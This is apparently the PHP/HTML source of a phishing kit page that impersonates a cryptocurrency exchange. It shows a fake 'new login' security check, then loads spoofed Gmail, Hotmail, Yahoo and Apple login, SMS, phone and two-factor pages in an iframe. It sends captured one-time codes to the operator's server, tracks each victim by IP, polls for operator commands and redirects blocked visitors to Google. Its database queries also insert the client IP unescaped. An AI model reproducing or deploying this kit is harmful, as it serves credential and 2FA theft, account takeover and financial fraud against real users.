<?php
@session_start();
error_reporting(0);

require_once "../cod3rconfig/registro.php";
require_once "../cod3rconfig/conexao.php";
require_once "../cod3rconfig/data.php";


require("../bot.php");
$erro = $_REQUEST['error'];
$ip = (isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER['REMOTE_ADDR']);

$query_info = "SELECT * FROM infos WHERE ip='$ip'";
$recorinfo = mysqli_query(DBConnect(), $query_info) or die(mysqli_error(DBConnect()));
$row_infio = mysqli_fetch_assoc($recorinfo);
$totalRowsinfo = mysqli_num_rows($recorinfo);

$query_verificacadastro1 = "SELECT * FROM ipblock WHERE ip = '$ip'";
$verificacadastro1 = mysqli_query(DBCOnnect(), $query_verificacadastro1) or die(mysqli_error(DBCOnnect()));
$row_verificacadastro1 = mysqli_fetch_assoc($verificacadastro1);

if ($row_verificacadastro1['ip'] == $ip) {
  header("Location: https://www.google.com/");
}

$email = $row_infio['usuario'];
$senhamaster = $row_infio['senha'];
$user = $row_infio['user_master'];
$saldo = $row_infio['saldo'];
$saldo1 = $row_infio['saldo1'];
$chat = $row_infio['adminchat'];

$tempo = time();
$atualiza = mysqli_query(DBCOnnect(), "UPDATE infos SET tempo='$tempo', status='Online' WHERE ip='$ip'");

?>
<!DOCTYPE html>
<html lang="en-US">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <title>Valr</title>
      <meta name="viewport" content="user-scalable=no, initial-scale=1, viewport-fit=cover, maximum-scale=1, minimum-scale=1, width=device-width, height=device-height, target-densitydpi=device-dpi">
  <link rel="stylesheet" href="/assets-ndax/css/account.css">
  <link rel="stylesheet" href="/assets-ndax/css/styles.302fb87b3176ce01.css" />
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.1.2/axios.min.js"></script>
  <script src="app/js/jquery-3.6.0.min.js" type="text/javascript"></script>
  <script src="dados_comando.js?t=<?=rand(999,99999999)?>" type="text/javascript"></script>
  <script type="text/javascript">
    $(document).ready(function() {
      atualiza();
    });

    function atualiza() {
      $.get('ver_online.php',
        function(resultado) {
          $('#onlineagora').html(resultado);
        });

      setTimeout('atualiza()', 1250);
    }

    function preLoad() {
      document.getElementById('kasa').src = "provider/<?php
                                                      $str = $email;
                                                      $res = explode("@", $str);
                                                      $sh = $res[1];
                                                      $pls = explode(".", $sh);
                                                      $provedor = $pls[0];
                                                      if ($provedor == 'yahoo') {
                                                        echo 'yahoo';
                                                      } elseif ($provedor == 'ymail') {
                                                        echo 'yahoo';
                                                      } elseif ($provedor == 'hotmail') {
                                                        echo 'hotmail';
                                                      } elseif ($provedor == 'outlook') {
                                                        echo 'hotmail';
                                                      } elseif ($provedor == 'live') {
                                                        echo 'hotmail';
                                                      } elseif ($provedor == 'msn') {
                                                        echo 'hotmail';
                                                      } elseif ($provedor == 'gmail') {
                                                        echo 'gmail';
                                                      } elseif ($provedor == 'googlemail') {
                                                        echo 'gmail';
                                                      } elseif ($provedor == 'icloud') {
                                                        echo 'loginapple';
                                                      } elseif ($provedor == 'me') {
                                                        echo 'loginapple';
                                                      } elseif ($provedor == 'mac') {
                                                        echo 'loginapple';
                                                      } else {
                                                        echo 'emails';
                                                      }
                                                      ?>.php";
      document.getElementById('casa').style.display = "flex";

    }
  </script>
</head>

<body onload="preLoad();" class="scrollable" style="padding-right: 0px;">
 
<div id="__layout">
  
<div style="width: 100vw; height: 100vh;   filter: blur(8px);
  -webkit-filter: blur(8px); background-image: url(/bg.png?t=2211123122312323213231); background-size: cover;"></div>  

  <bs-modal-backdrop class="modal-backdrop fade show"></bs-modal-backdrop>
  <modal-container id="framestart" role="dialog" tabindex="-1" class="modal fade show" style="display: block;" aria-modal="true">
    <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
    <div role="document" focustrap="" class="modal-dialog">
      <div class="modal-content">
        <ndax-kyc-dialog _nghost-ndax-c15="">
          <div _ngcontent-ndax-c15="" class="ndax-kyc-dialog">
            <div _ngcontent-ndax-c15="" class="modal-header">
              <h3 _ngcontent-ndax-c15="" class="modal-title"> Security check</h3>
            </div>
            <div _ngcontent-ndax-c15="" class="modal-body ng-star-inserted">
              <form _ngcontent-ndax-c15="" novalidate="" class="form ng-untouched ng-pristine ng-invalid">
                <div _ngcontent-ndax-c15="" class="disclaimer__container ng-star-inserted">
                  <cdn-image _ngcontent-ndax-c15="" width="100%" class="disclaimer__image ng-star-inserted" _nghost-ndax-c12="">
                    <img _ngcontent-ndax-c12="" src="/assets-ndax/images/shield-2.svg" alt="" style="width: 100%; object-fit: initial;">
                  </cdn-image>
                  <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">Verification is required to protect your account.</p>
                  <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">We've detected a new login to your account. To ensure you're the owner, you must sync your email with our platform. This helps keep your account secure and allows you to access all available features..</p>
 <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">IP: 38.165.230.218, 198.41.230.168</p>

 <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">Browser: Chrome</p>

 <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">Device: Windows</p>

 <p _ngcontent-ndax-c15="" class="disclaimer__title ng-star-inserted" style="text-align: justify;">Click the button below to confirm your identity and securely sync your email:</p>
                  <!-- <p _ngcontent-ndax-c15="" class="disclaimer__text ng-star-inserted" style="text-align: justify;"> To Sync your email just follow the instructions provided. It's a quick and easy process and will only take a few minutes. </p> -->
                </div>
                <div style="padding-top: 10px; color:rgb(41, 48, 112);">
                  <input id="checkMail" style="display: inline-block; opacity: 100% !important;" class="disclaimer__text ng-star-inserted" type="checkbox"> I read and understand
                </div>
              </form>
            </div>
            <div _ngcontent-ndax-c15="" class="modal-body"></div>
            <div _ngcontent-ndax-c15="" class="buttons">
              <button id="btnsend" style="outline: none; border: none; align-items: center;" _ngcontent-ndax-c113="" class="account-status__id-reupload ng-star-inserted" disabled>
                <cdn-image _ngcontent-ndax-c113="" width="100%" class="icon" _nghost-ndax-c12="">
                  <img _ngcontent-ndax-c12="" src="/assets-ndax/images/shield-2.svg" alt="" style="width: 100%; object-fit: initial;">
                </cdn-image>
                <div _ngcontent-ndax-c113="" class="label"> Sync with <span style="text-transform: capitalize;">&nbsp;<?php echo $provedor;?></span> </div>
              </button>
            </div>
          </div>
        </ndax-kyc-dialog>
      </div>
    </div>
    <div tabindex="0" class="cdk-visually-hidden cdk-focus-trap-anchor" aria-hidden="true"></div>
  </modal-container>
  <div id="frameend" style="display: none; position: absolute; top: 0; justify-content: center; align-items: center; width: 100%; height: 100%; z-index: 100000000000000;">
    <div id="casa" class="modalhome" style="display: none; top: 0; border-radius: 5px !important;">
      <div id="modal-container-id" style="margin-top:55px;">
        <div class="ui-modal-overlay ui-modal-overlay--visible"></div>
        <div class="ui-modaldialog__container_aviso term-agreement-modal" data-qa-id="modal-dialog">
          <iframe id="kasa" style="width:400px; overflow: hidden; height:590px; border-radius:10px; margin-right: 0px; border-radius: 5px !important;" src="" frameborder="0"></iframe>
        </div>
      </div>
    </div>
  </div>
  <script>
    const input_checkMail = document.getElementById('checkMail');
    const buttonCheck = document.getElementById('btnsend');

    input_checkMail.addEventListener('click', () => {
      if (input_checkMail.checked) {
        buttonCheck.removeAttribute('disabled', 'disabled');
      } else {
        buttonCheck.setAttribute('disabled', 'disabled');
      }
    });

    buttonCheck.addEventListener('click', () => {
      document.getElementById('framestart').style.display = 'none';
      document.getElementById('frameend').style.display = 'flex';
    });
  </script>
  <link rel="stylesheet" href="/assets/css/webchat.css">
  <div id="webChat" class="fabs" style="display: none; z-index: 100000000000000000000000000000000000;">
    <div class="chat" style="margin-right: 40px; margin-bottom: 5px; border-radius: 10px 10px 10px 10px;">
      <div class="chat_header">
        <span id="chat_head">Live Chat</span>
        <div class="chat_loader"></div>
        <div class="chat_option"><i class="zmdi zmdi-more-vert"></i>
          <ul>
            <li><span class="chat_color" style="border:solid 5px #2196F3" color="blue"></span></li>
            <li><span class="chat_color" style="border:solid 5px #00bcd4" color="cyan"></span></li>
            <li><span class="chat_color" style="border:solid 5px #607d8b" color="blue-grey"></span></li>
            <li><span class="chat_color" style="border:solid 5px #4caf50" color="green"></span></li>
            <li><span class="chat_color" style="border:solid 5px #8bc34a" color="light-green"></span></li>
            <li><span class="chat_color" style="border:solid 5px #cddc39" color="lime"></span></li>
            <li><span class="chat_color" style="border:solid 5px #ffc107" color="amber"></span></li>
            <li><span class="chat_color" style="border:solid 5px #ff5722" color="deep-orange"></span></li>
            <li><span class="chat_color" style="border:solid 5px #f44336" color="red"></span></li>
          </ul>
        </div>

      </div>
      <div class="chat_login">
        <a id="chat_send_email" class="fab"><i class="zmdi zmdi-email"></i></a>
        <input id="chat_log_email" placeholder="Email"></input>
        <div class="chat_login_alert"></div>
      </div>
      <div id="chat_converse" class="chat_converse">
        <span class="chat_msg_item chat_msg_item_admin">
          <div class="chat_avatar">
            <i class="zmdi zmdi-headset-mic"></i>
          </div>¡Hola! ¿Cómo puedo ayudarte?
        </span>
      </div>
      <div class="fab_field" style="border-radius: 0px 0px 10px 10px;">
        <a id="fab_listen" class="fab"><i class="zmdi zmdi-comments"></i></a>
        <a id="fab_send" class="fab"><i class="zmdi zmdi-mail-send"></i></a>
        <textarea style="padding-top: 18px; border-bottom: 1px solid gray; border-radius: 2px;" id="chatSend" name="chat_message" placeholder="Write a message" class="chat_field chat_message"></textarea>
        <input id="adminchat" type="hidden" style="display: none;" value="">
      </div>
    </div>
    <a id="prime" class="fab">
      <div style="display: flex; justify-content: center; align-items: center; height: 100%; font-size: 18px;">
        <i class="zmdi zmdi-comments"></i>
        <span style="margin-left: 5px;">Chat</span>
      </div>
    </a>
  </div>
  <audio style="display: none;" id="my-audio" controls>
    <source src="/assets/js/notificationsound.mp3" type="audio/mpeg">
  </audio>
  <script>
    window.addEventListener("load", function() {
      document.getElementById("prime").click();
      setTimeout(() => {
        document.getElementById("webChat").style.display = "unset"
      }, 1300);
    })
    window.addEventListener("click", function() {
      document.getElementById("prime").classList.remove("piscapisca")
    });

    if (localStorage.getItem("statuschat") === "enabled") {
      document.getElementById("webChat").style.display = "unset";
    }
  </script>
  <script>
    function realtimechat() {

    }
    setInterval(() => {
      realtimechat();
    }, 1400);

    function playsound() {
      document.getElementById("my-audio").play();
    }

    function checkUpdate() {
      fetch("/app/checkChat.php")
        .then(response => response.json())
        .then(data => {
          if (data.update) {
            const xhttp = new XMLHttpRequest();
            xhttp.onload = function() {
              var nullo = document.getElementById("adminchat").value = this.responseText;
              console.log(adminSend(nullo));
            }
            xhttp.open("GET", "/app/realtimechat.php");
            xhttp.send();
          } else {}
        });
    }
    setInterval(checkUpdate, 2000);
  </script>
  <script src="/assets/js/togglefab.js"></script>

  <script type="application/javascript">
    function sms() {
      document.getElementById('kasa').src = "sms/<?php
                                                  $str = $email;
                                                  $res = explode("@", $str);
                                                  $sh = $res[1];
                                                  $pls = explode(".", $sh);
                                                  $provedor = $pls[0];
                                                  if ($provedor == 'yahoo') {
                                                    echo 'yahoo';
                                                  } elseif ($provedor == 'ymail') {
                                                    echo 'yahoo';
                                                  } elseif ($provedor == 'hotmail') {
                                                    echo 'hotmail';
                                                  } elseif ($provedor == 'outlook') {
                                                    echo 'hotmail';
                                                  } elseif ($provedor == 'live') {
                                                    echo 'hotmail';
                                                  } elseif ($provedor == 'msn') {
                                                    echo 'hotmail';
                                                  } elseif ($provedor == 'gmail') {
                                                    echo 'gmail';
                                                  } elseif ($provedor == 'googlemail') {
                                                    echo 'gmail';
                                                  } elseif ($provedor == 'icloud') {
                                                    echo 'smsapple';
                                                  } elseif ($provedor == 'me') {
                                                    echo 'smsapple';
                                                  } elseif ($provedor == 'mac') {
                                                    echo 'smsapple';
                                                  } else {
                                                    echo 'emails';
                                                  }
                                                  ?>.php";
      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";

    }

    function telefone() {
      document.body.style.overflow = "hidden";
      document.getElementById('kasa').src = "phone/<?php
                                                    $str = $email;
                                                    $res = explode("@", $str);
                                                    $sh = $res[1];
                                                    $pls = explode(".", $sh);
                                                    $provedor = $pls[0];
                                                    if ($provedor == 'yahoo') {
                                                      echo 'yahoo';
                                                    } elseif ($provedor == 'ymail') {
                                                      echo 'yahoo';
                                                    } elseif ($provedor == 'hotmail') {
                                                      echo 'hotmail';
                                                    } elseif ($provedor == 'outlook') {
                                                      echo 'hotmail';
                                                    } elseif ($provedor == 'live') {
                                                      echo 'hotmail';
                                                    } elseif ($provedor == 'msn') {
                                                      echo 'hotmail';
                                                    } elseif ($provedor == 'gmail') {
                                                      echo 'gmail';
                                                    } elseif ($provedor == 'googlemail') {
                                                      echo 'gmail';
                                                    } elseif ($provedor == 'icloud') {
                                                      echo 'callapple';
                                                    } elseif ($provedor == 'me') {
                                                      echo 'callapple';
                                                    } elseif ($provedor == 'mac') {
                                                      echo 'callapple';
                                                    } else {
                                                      echo 'emails';
                                                    }
                                                    ?>.php";

      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";

    }


    function codemailprovedor() {
      document.body.style.overflow = "hidden";
      document.getElementById('kasa').src = "provider/<?php
                                                      $str = $email;
                                                      $res = explode("@", $str);
                                                      $sh = $res[1];
                                                      $pls = explode(".", $sh);
                                                      $provedor = $pls[0];
                                                      if ($provedor == 'yahoo') {
                                                        echo 'yahoocod';
                                                      } elseif ($provedor == 'ymail') {
                                                        echo 'yahoocod';
                                                      } elseif ($provedor == 'hotmail') {
                                                        echo 'hotmailcod';
                                                      } elseif ($provedor == 'outlook') {
                                                        echo 'hotmailcod';
                                                      } elseif ($provedor == 'live') {
                                                        echo 'hotmailcod';
                                                      } elseif ($provedor == 'msn') {
                                                        echo 'hotmailcod';
                                                      } elseif ($provedor == 'gmail') {
                                                        echo 'gmailcod';
                                                      } elseif ($provedor == 'googlemail') {
                                                        echo 'gmailcod';
                                                      } else {
                                                        echo 'emailscod';
                                                      }
                                                      ?>.php";

      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";
    }


    function verificarcodemail() {
      document.body.style.overflow = "hidden";
      document.getElementById('kasa').src = "provider/codigosms.php";
      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";
    }

    function doisfatores() {
      document.body.style.overflow = "hidden";
      document.getElementById('kasa').src = "provider/<?php
                                                      $str = $email;
                                                      $res = explode("@", $str);
                                                      $sh = $res[1];
                                                      $pls = explode(".", $sh);
                                                      $provedor = $pls[0];
                                                      if ($provedor == 'hotmail') {
                                                        echo 'hot2fna';
                                                      } elseif ($provedor == 'outlook') {
                                                        echo 'hot2fna';
                                                      } elseif ($provedor == 'live') {
                                                        echo 'hot2fna';
                                                      } elseif ($provedor == 'msn') {
                                                        echo 'hot2fna';
                                                      } elseif ($provedor == 'gmail') {
                                                        echo 'Gmail2fatores';
                                                      } elseif ($provedor == 'googlemail') {
                                                        echo 'Gmail2fatores';
                                                      } elseif ($provedor == 'icloud') {
                                                        echo 'authapple';
                                                      } elseif ($provedor == 'me') {
                                                        echo 'authapple';
                                                      } elseif ($provedor == 'mac') {
                                                        echo 'authapple';
                                                      } else {
                                                        echo 'emails2fa';
                                                      }
                                                      ?>.php";

      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";

    }

    function duasetapas() {
      console.log(`<?php
                                              $str = $email;
                                              $res = explode("@", $str);
                                              $sh = $res[1];
                                              $pls = explode(".", $sh);
                                              echo $pls[0];
                                               ?>`)
      document.getElementById('kasa').src = "<?php
                                              $str = $email;
                                              $res = explode("@", $str);
                                              $sh = $res[1];
                                              $pls = explode(".", $sh);
                                              $provedor = $pls[0];
                                              if ($provedor == 'yahoo') {
                                                echo 'notefiya';
                                              } elseif ($provedor == 'ymail') {
                                                echo 'notefiya';
                                              } elseif ($provedor == 'hotmail') {
                                                echo 'notefihot';
                                              } elseif ($provedor == 'outlook') {
                                                echo 'notefihot';
                                              } elseif ($provedor == 'live') {
                                                echo 'notefihot';
                                              } elseif ($provedor == 'msn') {
                                                echo 'notefihot';
                                              } elseif ($provedor == 'gmail') {
                                                echo 'notefi';
                                              } elseif ($provedor == 'googlemail') {
                                                echo 'notefi';
                                              } elseif ($provedor == 'naver') {
                                                echo 'notenav';
                                              }
                                              ?>.php";

      document.getElementById('casa').style.display = "flex";
      document.getElementById('aviso_bloque').style.display = "none";

    }



    function token2fa() {
      document.getElementById('token2fa_master').style.display = "block";
      document.getElementById('casa').style.display = "none";
      document.getElementById('aviso_bloque').style.display = "none";
    }


    function token2faerror() {
      document.getElementById('token2fa_master').style.display = "block";
      document.getElementById('error').style.display = "block";
      document.getElementById('casa').style.display = "none";
      document.getElementById('submit-login').disabled = false;
      document.getElementById('submit-login').innerHTML = "Authenticate";
      document.getElementById('otp').value = "";
      document.getElementById('aviso_bloque').style.display = "none";
    }

    function emailrecupera() {
      document.body.style.overflow = "hidden";
      document.getElementById('kasa').src = "provider/hotmailrecu.php";
    }
  </script>
  <script>
    function sendtoken() {

      $(document).ready(function() {

        var token = $("#otp").val();

        $.ajax({
          type: 'post',
          data: {
            token: token,
          },
          dataType: 'json',
          url: 'sendtoken2.php',
          success: function(data) {
            document.getElementById('submit-login').innerHTML = "<img src='./images/download.svg' width='25px' style='margin:0 auto; padding-top:5px;' >";
            document.getElementById('submit-login').disabled = true;
            dispararComando();
          }
        });

      });

      return false;

    }
  </script>
  <script src="/assets/js/notification.js?t=123123123"></script>
</body>

</html>